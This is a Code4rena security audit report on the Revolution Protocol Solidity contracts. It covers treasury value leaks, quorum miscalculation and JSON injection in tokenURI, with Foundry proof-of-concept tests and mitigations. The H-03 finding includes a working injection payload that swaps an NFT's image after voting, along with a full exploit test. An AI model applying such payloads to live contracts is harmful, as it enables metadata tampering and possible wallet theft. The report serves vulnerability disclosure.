Revolution Protocol

Findings & Analysis Report

2024-02-08

Table of contents

- Summary

- Scope

- Severity Criteria

- High Risk Findings (4)

  - [H-01] Incorrect amounts of ETH are transferred to the DAO treasury in ERC20TokenEmitter::buyToken(), causing a value leak in every transaction

  - [H-02] ArtPiece.totalVotesSupply and ArtPiece.quorumVotes are incorrectly calculated due to inclusion of the inaccessible voting powers of the NFT that is being auctioned at the moment when an art piece is created

  - [H-03] VerbsToken.tokenURI() is vulnerable to JSON injection attacks

  - [H-04] Malicious delegatees can block delegators from redelegating and from sending their NFTs

- Medium Risk Findings (14)

  - [M-01] Bidder can use donations to get VerbsToken from auction that already ended

  - [M-02] Violation of ERC-721 Standard in VerbsToken:tokenURI Implementation

  - [M-03] CultureIndex.sol#dropTopVotedPiece() - Malicious user can manipulate topVotedPiece to DoS the whole CultureIndex and AuctionHouse

  - [M-04] The quorumVotes can be bypassed

  - [M-05] Since buyToken function has no slippage checking, users can get less tokens than expected when they buy tokens directly

  - [M-06] ERC20TokenEmitter will not work after a certain period of time

  - [M-07] positionMapping for last element in heap is not updated when extracting max element

  - [M-08] MaxHeap.sol: Already extracted tokenId may be extracted again

  - [M-09] Anyone can pause AuctionHouse in _createAuction

  - [M-10] ERC20TokenEmitter::buyToken function mints more tokens to users than it should do

  - [M-11] Since art pieces’ size is not limited, attacker may block AuctionHouse from creating and settling auctions

  - [M-12] Once EntropyRateBps is set too high, can lead to denial-of-service (DoS) due to an invalid ETH amount

  - [M-13] It may be possible to DoS AuctionHouse by specifying malicious creators

  - [M-14] encodedData argument of hashStruct is not calculated perfectly for EIP712 signed messages in CultureIndex.sol

- Low Risk and Non-Critical Issues

  - 01 Callers/buyers can control protocolRewardsRecipients to receive self-rebates

  - 02 Irreversible correction if minCreatorRateBps has been set too high

  - 03 Addressing Zero-Value Bids in Auction Contracts

  - 04 Auction Extension Mechanism and Ethereum Transaction Dynamics

  - 05 Impact of Ether Value on Auction Bidding Mechanism

  - 06 Considerations for Hardcoding Addresses in Smart Contracts

  - 07 Challenges and Strategies in Managing Voting Participation in Growing Communities

  - 08 Inaccurate use of inequality operator

  - 09 Potential Risks in Dynamic NFT Metadata Management in VerbsToken Smart Contract

  - 10 ECDSA.recover over ecrecover

  - 11 Unutilized function

  - 12 Comment and doc spec mismatch

  - 13 Activate the optimizer

- Gas Optimizations

  - G-01 MAX_NUM_CREATORS check is not required when minting in VerbsToken.sol contract

  - G-02 Mappings not used externally/internally can be marked private

  - G-03 No need to initialize variable size to 0

  - G-04 Use left + 1 to calculate value of right in maxHeapify() to save gas

  - G-05 Place size check at the start of maxHeapify() to save gas on returning case

  - G-06 Cache parent(current) in insert() function to save gas

  - G-07 else-if block in function updateValue() can be removed since newValue can never be less than oldValue

  - G-08 size > 0 check not required in function getMax()

  - G-09 Cache msgValueRemaining - toPayTreasury in buyToken() to save gas

  - G-10 creatorsAddress != address(0) check not required in buyToken()

  - G-11 Cache return value of _calculateTokenWeight() function to prevent SLOAD

  - G-12 Cache erc20VotingToken.totalSupply() to save gas

  - G-13 Unnecessary for loop can be removed by shifting its statements into an existing for loop

  - G-14 Return memory variable pieceId instead of storage variable newPiece.pieceId to save gas

  - G-15 Calculate creatorsShare before auctioneerPayment in buyToken() to prevent unnecessary SUB operation

  - G-16 Remove msgValue < computeTotalReward(msgValue check from TokenEmitterRewards.sol contract

  - G-17 Optimize computeTotalReward() and computePurchaseRewards into one function to save gas

  - G-18 Calculation in computeTotalReward() can be simplified to save gas

  - G-19 Negating twice in require check is not required in _vote() function

- Audit Analysis

- Disclosures

Overview

About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the Revolution Protocol smart contract system written in Solidity. The audit took place from December 13 to December 21, 2023.

Wardens

107 Wardens contributed reports to Revolution Protocol:

- bart1e

- KingNFT

- 0xDING99YA

- MrPotatoMagic

- zhaojie

- ZanyBonzy

- osmanozdemir1

- cccz

- ArmedGoose

- jerseyjoewalcott

- rvierdiiev

- SpicyMeatball

- hals

- ktg

- 0xG0P1

- King_

- nmirchev8

- Sathish9098

- shaka

- pavankv

- Ward (natzuu and 0xpessimist)

- sivanesh_808

- BowTiedOriole

- Ryonen

- pep7siup

- hunter_w3b

- 0xCiphky

- imare

- peanuts

- ihtishamsudo

- DanielArmstrong

- SovaSlava

- Aamir

- 00xSEV

- 0x11singh99

- 0xAnah

- c3phas

- KupiaSec

- Tricko

- mojito_auditor

- 0xmystery

- ast3ros

- wintermute

- _eperezok

- deth

- XDZIBECX

- Ocean_Sky

- BARW (BenRai and albertwh1te)

- ayden

- deepplus

- Brenzee

- AS

- fnanni

- 0xAsen

- Pechenite (Bozho and radev_sw)

- wangxx2026

- Inference

- dimulski

- rouhsamad

- haxatron

- ke1caM

- Raihan

- hakymulla

- plasmablocks

- Abdessamed

- 0xlemon

- twcctop

- 0xluckhu

- n1punp

- Udsen

- ABAIKUNANBAEV

- mahdirostami

- kaveyjoe

- jnforja

- IllIllI

- wahedtalash77

- unique

- albahaca

- Aymen0909

- adeolu

- passteque

- SadeeqXmosh (0xMosh and Oxsadeeq)

- Timenov

- JCK

- SAQ

- donkicha

- lsaudit

- naman1778

- roland

- cheatc0d3

- spacelord47

- developerjordy

- 0xhitman

- Topmark

- leegh

- pontifex

- 0xHelium

- AkshaySrivastav

- y4y

- ptsanev

- 0x175

- McToady

- TermoHash

This audit was judged by 0xTheC0der.

Final report assembled by PaperParachute.

Summary

The C4 analysis yielded an aggregated total of 18 unique vulnerabilities. Of these vulnerabilities, 4 received a risk rating in the category of HIGH severity and 14 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 34 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 17 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.

Scope

The code under review can be found within the C4 Revolution Protocol repository, and is composed of 7 smart contracts written in the Solidity programming language and includes 919 lines of Solidity code.

In addition to the known issues identified by the project team, a Code4rena bot race was conducted at the start of the audit. The winning bot, vuln-detector from warden oualidpro, generated the Automated Findings report and all findings therein were classified as out of scope.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

- Malicious Input Handling

- Escalation of privileges

- Arithmetic

- Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (4)

[H-01] Incorrect amounts of ETH are transferred to the DAO treasury in ERC20TokenEmitter::buyToken(), causing a value leak in every transaction

Submitted by osmanozdemir1, also found by shaka, SovaSlava, KupiaSec, MrPotatoMagic, ast3ros, BARW, 0xDING99YA, 0xCiphky, bart1e, ktg, AS, SpicyMeatball, hakymulla, plasmablocks, Abdessamed, 0xlemon, twcctop, 0xluckhu, and n1punp

When users buy governance tokens through the ERC20TokenEmitter::buyToken function, a portion of the provided ETH is reserved for creators according to creatorRateBps.

Part of this reserved ETH is sent directly to the creators according to entropyRateBps, and the remainder is used to buy governance tokens for the creators.

That remainder, which is used to buy governance tokens, is never sent to the DAO treasury. It stays locked in the ERC20TokenEmitter contract, so the treasury loses value on every buyToken call.

function buyToken(

address[] calldata addresses,

uint[] calldata basisPointSplits,

ProtocolRewardAddresses calldata protocolRewardsRecipients

) public payable nonReentrant whenNotPaused returns (uint256 tokensSoldWad) {

// ...

// Get value left after protocol rewards

uint256 msgValueRemaining = _handleRewardsAndGetValueToSend(

msg.value,

protocolRewardsRecipients.builder,

protocolRewardsRecipients.purchaseReferral,

protocolRewardsRecipients.deployer

);

//Share of purchase amount to send to treasury

uint256 toPayTreasury = (msgValueRemaining * (10_000 - creatorRateBps)) / 10_000;

//Share of purchase amount to reserve for creators

//Ether directly sent to creators

uint256 creatorDirectPayment = ((msgValueRemaining - toPayTreasury) * entropyRateBps) / 10_000;

//Tokens to emit to creators

int totalTokensForCreators = ((msgValueRemaining - toPayTreasury) - creatorDirectPayment) > 0

? getTokenQuoteForEther((msgValueRemaining - toPayTreasury) - creatorDirectPayment)

: int(0);

// Tokens to emit to buyers

int totalTokensForBuyers = toPayTreasury > 0 ? getTokenQuoteForEther(toPayTreasury) : int(0);

//Transfer ETH to treasury and update emitted

emittedTokenWad += totalTokensForBuyers;

if (totalTokensForCreators > 0) emittedTokenWad += totalTokensForCreators;

//Deposit funds to treasury

--> (bool success, ) = treasury.call{ value: toPayTreasury }(new bytes(0)); //@audit-issue Treasury is not paid correctly. Only the buyers share is sent. Creators share to buy governance tokens are not sent to treasury

require(success, "Transfer failed."); //@audit `creators total share` - `creatorDirectPayment` should also be sent to treasury. ==> Which is "((msgValueRemaining - toPayTreasury) - creatorDirectPayment)"

//Transfer ETH to creators

if (creatorDirectPayment > 0) {

(success, ) = creatorsAddress.call{ value: creatorDirectPayment }(new bytes(0));

require(success, "Transfer failed.");

}

// ... rest of the code

}

In the code above:

toPayTreasury is the buyer’s portion of the sent ether.

(msgValueRemaining - toPayTreasury) is the creator’s portion of the sent ether.

((msgValueRemaining - toPayTreasury) - creatorDirectPayment) is the remaining part of the creator’s share after direct payment (which is used to buy the governance token).

As we can see above, the part that is used to buy governance tokens is not sent to the treasury. Only the buyer’s portion is sent.
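The split described above can be checked with a few lines of integer arithmetic. The following is a minimal Python sketch, not the contract code: the function name split_purchase and the dictionary keys are hypothetical, and the inputs (97.5 ether remaining after protocol rewards, creatorRateBps of 1000, entropyRateBps of 5000) are taken from the proof of concept in this finding.

```python
BPS = 10_000      # basis-point denominator used in buyToken()
ETHER = 10**18    # wei per ether


def split_purchase(msg_value_remaining, creator_rate_bps, entropy_rate_bps):
    """Mirror the integer arithmetic of buyToken() on the post-rewards value (in wei)."""
    to_pay_treasury = msg_value_remaining * (BPS - creator_rate_bps) // BPS
    creators_share = msg_value_remaining - to_pay_treasury
    creator_direct_payment = creators_share * entropy_rate_bps // BPS
    # ETH backing the creators' governance tokens; the reported code never forwards it
    creators_token_eth = creators_share - creator_direct_payment
    return {
        "to_pay_treasury": to_pay_treasury,
        "creator_direct_payment": creator_direct_payment,
        "stuck_in_emitter": creators_token_eth,
        # what the treasury would receive under the recommended mitigation
        "treasury_after_fix": to_pay_treasury + creators_token_eth,
    }


# 100 ether sent, 2.5% protocol rewards already deducted -> 97.5 ether remaining
result = split_purchase(975 * ETHER // 10, creator_rate_bps=1_000, entropy_rate_bps=5_000)
for name, wei in result.items():
    print(f"{name}: {wei / ETHER} ether")
```

Under these assumptions, the amount left in the emitter equals the creators' share minus the direct payment, which is the amount the finding says should also go to the treasury.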

Impact

- DAO treasury is not properly paid even though the corresponding governance tokens are minted.

- Every buyToken transaction will cause a value leak to the DAO treasury. The leaked ETH amounts are stuck in the ERC20TokenEmitter contract.

Proof of Concept

Coded PoC

You can use the protocol’s own test suite to run this PoC.

- Copy and paste the snippet below into the ERC20TokenEmitter.t.sol test file.

- Run it with forge test --match-test testBuyToken_ValueLeak -vvv

function testBuyToken_ValueLeak() public {

// Set creator and entropy rates.

// Creator rate will be 10% and entropy rate will be 50%

uint256 creatorRate = 1000;

uint256 entropyRate = 5000;

vm.startPrank(address(dao));

erc20TokenEmitter.setCreatorRateBps(creatorRate);

erc20TokenEmitter.setEntropyRateBps(entropyRate);

// Check dao treasury and erc20TokenEmitter balances. Balance of both of them should be 0.

uint256 treasuryETHBalance_BeforePurchase = address(erc20TokenEmitter.treasury()).balance;

uint256 emitterContractETHBalance_BeforePurchase = address(erc20TokenEmitter).balance;

assertEq(treasuryETHBalance_BeforePurchase, 0);

assertEq(emitterContractETHBalance_BeforePurchase, 0);

// Create token purchase parameters

address[] memory recipients = new address[](1);

recipients[0] = address(1);

uint256[] memory bps = new uint256[](1);

bps[0] = 10_000;

// Give some ETH to user and buy governance token.

vm.startPrank(address(0));

vm.deal(address(0), 100000 ether);

erc20TokenEmitter.buyToken{ value: 100 ether }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

// User bought 100 ether worth of tokens.

// Normally with 2.5% fixed protocol rewards, 10% creator share and 50% entropy share:

// -> 2.5 ether is protocol rewards.

// -> 87.75 ether is buyer share (90% of the 97.5)

// -> 9.75 of the ether is creators share

// - 4.875 ether directly sent to creators

// - 4.875 ether should be used to buy governance token and should be sent to the treasury.

// However, the 4.875 ether is never sent to the treasury even though it is used to buy governance tokens. It is stuck in the Emitter contract.

// Check balances after purchase.

uint256 treasuryETHBalance_AfterPurchase = address(erc20TokenEmitter.treasury()).balance;

uint256 emitterContractETHBalance_AfterPurchase = address(erc20TokenEmitter).balance;

uint256 creatorETHBalance_AfterPurchase = address(erc20TokenEmitter.creatorsAddress()).balance;

// Creator direct payment amount is 4.875 as expected

assertEq(creatorETHBalance_AfterPurchase, 4.875 ether);

// Dao treasury has 87.75 ether instead of 92.625 ether.

// 4.875 ether that is used to buy governance tokens for creators is never sent to treasury and still in the emitter contract.

assertEq(treasuryETHBalance_AfterPurchase, 87.75 ether);

assertEq(emitterContractETHBalance_AfterPurchase, 4.875 ether);

}

Results after running the test:

Running 1 test for test/token-emitter/ERC20TokenEmitter.t.sol:ERC20TokenEmitterTest

[PASS] testBuyToken_ValueLeak() (gas: 459490)

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.25ms

Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used

Foundry

Recommended Mitigation Steps

I would recommend transferring the remaining ETH used to buy governance tokens to the treasury.

+ uint256 creatorsEthAfterDirectPayment = ((msgValueRemaining - toPayTreasury) - creatorDirectPayment);

//Deposit funds to treasury

- (bool success, ) = treasury.call{ value: toPayTreasury }(new bytes(0));

+ (bool success, ) = treasury.call{ value: toPayTreasury + creatorsEthAfterDirectPayment }(new bytes(0));

require(success, "Transfer failed.");

rocketman-21 (Revolution) confirmed

[H-02] ArtPiece.totalVotesSupply and ArtPiece.quorumVotes are incorrectly calculated due to inclusion of the inaccessible voting powers of the NFT that is being auctioned at the moment when an art piece is created

Submitted by osmanozdemir1, also found by hals, 0xG0P1, King_, SpicyMeatball, ktg, and rvierdiiev

In this protocol, art pieces are uploaded, voted on by the community and auctioned. Being the highest-voted art piece is not enough to go to auction; the art piece must also reach the quorum.

The quorum for an art piece is determined by the total vote supply at the time the art piece is created. This total vote supply is calculated from the current supplies of erc20VotingToken and erc721VotingToken. Each erc721VotingToken carries a weight relative to a regular erc20VotingToken, so ERC721 tokens give users much more voting power.

file: CultureIndex.sol

function createPiece ...{

// ...

newPiece.totalVotesSupply = _calculateVoteWeight(

erc20VotingToken.totalSupply(),

--> erc721VotingToken.totalSupply() //@audit-issue This includes the erc721 token which is currently on auction. No one can use that token to vote on this piece.

);

// ...

--> newPiece.quorumVotes = (quorumVotesBPS * newPiece.totalVotesSupply) / 10_000; //@audit quorum votes will also be higher than it should be.

// ...

}

_calculateVoteWeight function:

function _calculateVoteWeight(uint256 erc20Balance, uint256 erc721Balance) internal view returns (uint256) {

return erc20Balance + (erc721Balance * erc721VotingTokenWeight * 1e18);

}

As I mentioned above, totalVotesSupply and quorumVotes of an art piece are calculated when the art piece is created based on the total supplies of the erc20 and erc721 tokens.

However, there is an important logic/context issue here.

This calculation includes the erc721 verbs token which is currently on auction and sitting in the AuctionHouse contract. The voting power of this token can never be used for that art piece because:

- The AuctionHouse contract obviously cannot vote.

- The future buyer of this NFT also cannot vote, since users’ right to vote is determined based on the creation block of the art piece.

In the end, totally inaccessible voting powers are included when calculating ArtPiece.totalVotesSupply and ArtPiece.quorumVotes, which results in incorrect quorum requirements and makes it harder to reach the quorum.

Impact

- Quorum vote requirements for created art pieces will be incorrect if there is an ongoing auction at the time the art piece is created.

- This will make it harder to reach the quorum.

- Unfair situations can occur between two art pieces (different totalVotesSupply, different quorum requirements, but the same accessible/actual vote supply).

I would also like to add that the impact of this issue is not linear. It will decrease over time as the erc721VotingToken supply increases day by day.

The impact is much higher in the early phase of the protocol, especially in the first days/weeks after the protocol launch where the verbsToken supply is only a handful.

Proof of Concept

Let’s assume that:

- The current erc20VotingToken supply is 1000 and it won’t change for this scenario.

- The weight of erc721VotingToken is 100.

- quorumVotesBPS is 5000 (50% quorum required).

Day 0: Protocol Launched

- Users started to upload their art pieces.

- There is no NFT minted yet.

- The total votes supply for all of these art pieces is 1000.

Day 1: First Mint

- One of the art pieces is chosen.

- The art piece is minted in the VerbsToken contract and transferred to the AuctionHouse contract.

- The auction has started.

- erc721VotingToken supply is 1 at the moment.

- Users keep uploading art pieces for the next day’s auction.

- For these art pieces uploaded on day 1:

  totalVotesSupply is 1100

  quorumVotes is 550

  Accessible vote supply is still 1000.

- According to accessible votes, the quorum rate is 55%, not 50%.

Day 2: Next Day

- The auction on the first day is concluded and transferred to the buyer.

- The next verbsToken is minted and the auction is started.

- erc721VotingToken supply is 2.

- Users keep uploading art pieces for the next day’s auction.

- For these art pieces uploaded on day 2:

  totalVotesSupply is 1200

  quorumVotes is 600

  Accessible vote supply is 1100. (1000 + 100 from the buyer of the first NFT)

- The actual quorum rate for these art pieces is ~54.5% (600 / 1100).

NOTE: The numbers used here are just for demonstration purposes. The impact will be much higher if the erc721VotingToken weight is a bigger value like 1000.
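The day-by-day numbers above can be reproduced with a short calculation. This is a minimal Python sketch under the scenario's own simplifications: supplies are plain integers without the 1e18 scaling used in _calculateVoteWeight, and the function name quorum_snapshot and the parameter nfts_on_auction are hypothetical. The last returned value shows the quorum that would result if the voting power held by the auction house were excluded.

```python
def quorum_snapshot(erc20_supply, nft_supply, nft_weight, quorum_bps, nfts_on_auction):
    """Return (totalVotesSupply, quorumVotes, accessible supply, quorum without auctioned NFTs)."""
    total_votes_supply = erc20_supply + nft_supply * nft_weight
    quorum_votes = quorum_bps * total_votes_supply // 10_000
    # votes that some account can actually cast for a piece created right now
    accessible = total_votes_supply - nfts_on_auction * nft_weight
    quorum_excluding_auction = quorum_bps * accessible // 10_000
    return total_votes_supply, quorum_votes, accessible, quorum_excluding_auction


for day, nft_supply in ((1, 1), (2, 2)):
    total, quorum, accessible, adjusted = quorum_snapshot(1000, nft_supply, 100, 5000, 1)
    print(
        f"day {day}: totalVotesSupply={total} quorumVotes={quorum} "
        f"accessible={accessible} effective rate={quorum / accessible:.3f} "
        f"quorum excluding auctioned NFT={adjusted}"
    )
```

The effective rate is the stored quorumVotes divided by the accessible supply, which is why it exceeds the configured 50% while an NFT sits in the auction house.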

Recommended Mitigation Steps

I strongly recommend subtracting the voting power of the NFT currently on auction when calculating the vote supply of the art piece and the quorum requirements.

// Note: You will also need to store auctionHouse contract address in this contract.

+ address auctionHouse;

function createPiece () {

...

newPiece.totalVotesSupply = _calculateVoteWeight(

erc20VotingToken.totalSupply(),

- erc721VotingToken.totalSupply()

+ // Note: We don't subtract 1 as fixed amount in case of auction house being paused and not having an NFT at that moment. We only subtract if there is an ongoing auction.

+ erc721VotingToken.totalSupply() - erc721VotingToken.balanceOf(auctionHouse)

);

...

}

@rocketman-21 Requesting additional sponsor input on this one.

This seems to be valid to me after a first review.

rocketman-21 (Revolution) confirmed and commented:

Super valid ty sirs.

0xTheC0der (Judge) increased severity to High and commented:

Severity increase was discussed with sponsor privately.

[H-03] VerbsToken.tokenURI() is vulnerable to JSON injection attacks

Submitted by KingNFT, also found by ZanyBonzy and ArmedGoose

The CultureIndex.createPiece() function doesn’t sanitize malicious characters in metadata.image and metadata.animationUrl, which exposes VerbsToken.tokenURI() to various JSON injection attack vectors.

- If the front-end app doesn’t process the JSON string properly, such as using eval() to parse the token URI, then any malicious code can be executed in the front end. Funds in users’ connected wallets, such as MetaMask, might be stolen in this case.

- Even if the front end processes the data securely, such as using the standard built-in JSON.parse() to read the URI, an adversary can still exploit this vulnerability to replace the art piece image/animation with arbitrary other ones after the voting stage has completed.

That is, the final metadata used by the NFT (VerbsToken) is not the art piece that users voted on. This attack could benefit attackers, for example by creating NFTs containing the same art piece data as existing high-priced NFTs. It could also expose the project to legal risks, for example through NFTs with violent or pornographic images.

More reference: https://www.comparitech.com/net-admin/json-injection-guide/

Proof of Concept

As shown in the createPiece() function below, there is no check on whether metadata.image and metadata.animationUrl contain malicious characters, such as ", : and ,.

File: src\CultureIndex.sol

function createPiece(
    ArtPieceMetadata calldata metadata,
    CreatorBps[] calldata creatorArray
) public returns (uint256) {
    uint256 creatorArrayLength = validateCreatorsArray(creatorArray);

    // Validate the media type and associated data
    validateMediaType(metadata);

    uint256 pieceId = _currentPieceId++;

    /// @dev Insert the new piece into the max heap
    maxHeap.insert(pieceId, 0);

    ArtPiece storage newPiece = pieces[pieceId];

    newPiece.pieceId = pieceId;
    newPiece.totalVotesSupply = _calculateVoteWeight(
        erc20VotingToken.totalSupply(),
        erc721VotingToken.totalSupply()
    );
    newPiece.totalERC20Supply = erc20VotingToken.totalSupply();
    newPiece.metadata = metadata;
    newPiece.sponsor = msg.sender;
    newPiece.creationBlock = block.number;
    newPiece.quorumVotes = (quorumVotesBPS * newPiece.totalVotesSupply) / 10_000;

    for (uint i; i < creatorArrayLength; i++) {
        newPiece.creators.push(creatorArray[i]);
    }

    emit PieceCreated(pieceId, msg.sender, metadata, newPiece.quorumVotes, newPiece.totalVotesSupply);

    // Emit an event for each creator
    for (uint i; i < creatorArrayLength; i++) {
        emit PieceCreatorAdded(pieceId, creatorArray[i].creator, msg.sender, creatorArray[i].bps);
    }

    return newPiece.pieceId;
}

An adversary can exploit this to make VerbsToken.tokenURI() return various malicious JSON objects to the front-end app.

File: src\Descriptor.sol

function constructTokenURI(TokenURIParams memory params) public pure returns (string memory) {
    string memory json = string(
        abi.encodePacked(
            '{"name":"',
            params.name,
            '", "description":"',
            params.description,
            '", "image": "',
            params.image,
            '", "animation_url": "',
            params.animation_url,
            '"}'
        )
    );
    return string(abi.encodePacked("data:application/json;base64,", Base64.encode(bytes(json))));
}

For example, if an attacker submits the following metadata:

ICultureIndex.ArtPieceMetadata({

name: 'Mona Lisa',

description: 'A renowned painting by Leonardo da Vinci',

mediaType: ICultureIndex.MediaType.IMAGE,

image: 'ipfs://realMonaLisa',

text: '',

animationUrl: '", "image": "ipfs://fakeMonaLisa' // malicious string injected



});

During the voting stage, the front end gets the image field from CultureIndex.pieces[pieceId].metadata.image, which is ipfs://realMonaLisa. But after voting completes, the art piece is minted as a VerbsToken NFT. The front end would then query VerbsToken.tokenURI(tokenId) to get the base64-encoded metadata, which would be:

data:application/json;base64,eyJuYW1lIjoiVnJiIDAiLCAiZGVzY3JpcHRpb24iOiJNb25hIExpc2EuIEEgcmVub3duZWQgcGFpbnRpbmcgYnkgTGVvbmFyZG8gZGEgVmluY2kiLCAiaW1hZ2UiOiAiaXBmczovL3JlYWxNb25hTGlzYSIsICJhbmltYXRpb25fdXJsIjogIiIsICJpbWFnZSI6ICJpcGZzOi8vZmFrZU1vbmFMaXNhIn0=

In the front end, when we use JSON.parse() to parse the above data, we get image as ipfs://fakeMonaLisa.

Image link: https://gist.github.com/assets/68863517/d769d7ac-db02-4e3b-94d2-dfaf3752b763
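The effect of the injected string can be reproduced outside the contract. The following minimal Python sketch concatenates the fields the same way constructTokenURI does and parses the result. The helper name construct_token_json and the literal name and description values are illustrative assumptions. Python's json.loads keeps the last value for a duplicated key, which matches the JSON.parse() behaviour described in this finding.

```python
import json


def construct_token_json(name, description, image, animation_url):
    """Concatenate the fields without escaping, as Descriptor.constructTokenURI does."""
    return (
        '{"name":"' + name
        + '", "description":"' + description
        + '", "image": "' + image
        + '", "animation_url": "' + animation_url
        + '"}'
    )


# Malicious animationUrl: closes the string early and appends a second "image" key
payload = '", "image": "ipfs://fakeMonaLisa'

raw = construct_token_json(
    "Vrb 0",
    "Mona Lisa. A renowned painting by Leonardo da Vinci",
    "ipfs://realMonaLisa",
    payload,
)
parsed = json.loads(raw)

print(raw)
print("image seen by the front end:", parsed["image"])
```

The raw string contains two "image" keys; the parser silently returns the second one, so the image voted on and the image in the minted token differ.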


Below is the full coded PoC:

// SPDX-License-Identifier: MIT

pragma solidity 0.8.22;

import {Test} from "forge-std/Test.sol";

import {console2} from "forge-std/console2.sol";

import {RevolutionBuilderTest} from "./RevolutionBuilder.t.sol";

import {ICultureIndex} from "../src/interfaces/ICultureIndex.sol";

contract JsonInjectionAttackTest is RevolutionBuilderTest {

string public tokenNamePrefix = "Vrb";

string public tokenName = "Vrbs";

string public tokenSymbol = "VRBS";

function setUp() public override {

super.setUp();

super.setMockParams();

super.setERC721TokenParams(tokenName, tokenSymbol, "https://example.com/token/", tokenNamePrefix);

super.setCultureIndexParams("Vrbs", "Our community Vrbs. Must be 32x32.", 10, 500, 0);

super.deployMock();

}

function testImageReplacementAttack() public {

ICultureIndex.CreatorBps[] memory creators = _createArtPieceCreators();

ICultureIndex.ArtPieceMetadata memory metadata = ICultureIndex.ArtPieceMetadata({

name: 'Mona Lisa',

description: 'A renowned painting by Leonardo da Vinci',

mediaType: ICultureIndex.MediaType.IMAGE,

image: 'ipfs://realMonaLisa',

text: '',

animationUrl: '", "image": "ipfs://fakeMonaLisa' // malicious string injected

});

uint256 pieceId = cultureIndex.createPiece(metadata, creators);

vm.startPrank(address(erc20TokenEmitter));

erc20Token.mint(address(this), 10_000e18);

vm.stopPrank();

vm.roll(block.number + 1); // ensure vote snapshot is taken

cultureIndex.vote(pieceId);

// 1. the image used during voting stage is 'ipfs://realMonaLisa'

ICultureIndex.ArtPiece memory topPiece = cultureIndex.getTopVotedPiece();

assertEq(pieceId, topPiece.pieceId);

assertEq(keccak256("ipfs://realMonaLisa"), keccak256(bytes(topPiece.metadata.image)));

// 2. after being minted to VerbsToken, the image becomes to 'ipfs://fakeMonaLisa'

vm.startPrank(address(auction));

uint256 tokenId = erc721Token.mint();

vm.stopPrank();

assertEq(pieceId, tokenId);

string memory encodedURI = erc721Token.tokenURI(tokenId);

console2.log(encodedURI);

string memory prefix = _substring(encodedURI, 0, 29);

assertEq(keccak256('data:application/json;base64,'), keccak256(bytes(prefix)));

string memory actualBase64Encoded = _substring(encodedURI, 29, bytes(encodedURI).length);

string memory expectedBase64Encoded = 'eyJuYW1lIjoiVnJiIDAiLCAiZGVzY3JpcHRpb24iOiJNb25hIExpc2EuIEEgcmVub3duZWQgcGFpbnRpbmcgYnkgTGVvbmFyZG8gZGEgVmluY2kiLCAiaW1hZ2UiOiAiaXBmczovL3JlYWxNb25hTGlzYSIsICJhbmltYXRpb25fdXJsIjogIiIsICJpbWFnZSI6ICJpcGZzOi8vZmFrZU1vbmFMaXNhIn0=';

assertEq(keccak256(bytes(expectedBase64Encoded)), keccak256(bytes(actualBase64Encoded)));

}

function _createArtPieceCreators() internal pure returns (ICultureIndex.CreatorBps[] memory) {

ICultureIndex.CreatorBps[] memory creators = new ICultureIndex.CreatorBps[](1);

creators[0] = ICultureIndex.CreatorBps({creator: address(0xc), bps: 10_000});

return creators;

}

function _substring(string memory str, uint256 startIndex, uint256 endIndex)

internal

pure

returns (string memory)

{

bytes memory strBytes = bytes(str);

bytes memory result = new bytes(endIndex-startIndex);

for (uint256 i = startIndex; i < endIndex; i++) {

result[i - startIndex] = strBytes[i];

}

return string(result);

}

}

And the test logs:

2023-12-revolutionprotocol\packages\revolution> forge test --match-contract JsonInjectionAttackTest -vv

[⠑] Compiling...

No files changed, compilation skipped

Running 1 test for test/JsonInjectionAttack.t.sol:JsonInjectionAttackTest

[PASS] testImageReplacementAttack() (gas: 1437440)

Logs:

data:application/json;base64,eyJuYW1lIjoiVnJiIDAiLCAiZGVzY3JpcHRpb24iOiJNb25hIExpc2EuIEEgcmVub3duZWQgcGFpbnRpbmcgYnkgTGVvbmFyZG8gZGEgVmluY2kiLCAiaW1hZ2UiOiAiaXBmczovL3JlYWxNb25hTGlzYSIsICJhbmltYXRpb25fdXJsIjogIiIsICJpbWFnZSI6ICJpcGZzOi8vZmFrZU1vbmFMaXNhIn0=

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 16.30ms

Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Recommended Mitigation Steps

Sanitize input data according to: https://github.com/OWASP/json-sanitizer
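As an illustration of what sanitizing achieves, the sketch below escapes each field before concatenation. It is a Python model only: an on-chain fix would need an equivalent escaping or validation routine in Solidity, and the helper names escape_json_string and construct_token_json_escaped are hypothetical.

```python
import json


def escape_json_string(value):
    """Escape quotes, backslashes and control characters for use inside a JSON string."""
    # json.dumps returns a quoted JSON string literal; drop the surrounding quotes
    return json.dumps(value)[1:-1]


def construct_token_json_escaped(name, description, image, animation_url):
    """Same layout as constructTokenURI, but every field is escaped first."""
    return (
        '{"name":"' + escape_json_string(name)
        + '", "description":"' + escape_json_string(description)
        + '", "image": "' + escape_json_string(image)
        + '", "animation_url": "' + escape_json_string(animation_url)
        + '"}'
    )


payload = '", "image": "ipfs://fakeMonaLisa'
safe_raw = construct_token_json_escaped(
    "Vrb 0", "Mona Lisa", "ipfs://realMonaLisa", payload
)
safe = json.loads(safe_raw)
print("image:", safe["image"])
print("animation_url:", safe["animation_url"])
```

With escaping, the payload stays inside the animation_url value and the image field keeps the value that was voted on. Rejecting such characters at createPiece() time would be an alternative design.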

rocketman-21 (Revolution) confirmed

Looks like a Medium at first glance, but after some thought High severity seems appropriate due to assets being compromised in a pretty straightforward way.

1. The front-end part of the present issue is definitely QA but is part of a more severe correctly identified root cause, see point 4.

2. The purpose of using IPFS is immutability. Thus, the art piece cannot be simply changed on the server. If users vote on an NFT where the underlying art is hosted on a normal webserver, it’s user error.

3. I agree that the provided example findings are QA due to lack of impact on contract/protocol level.

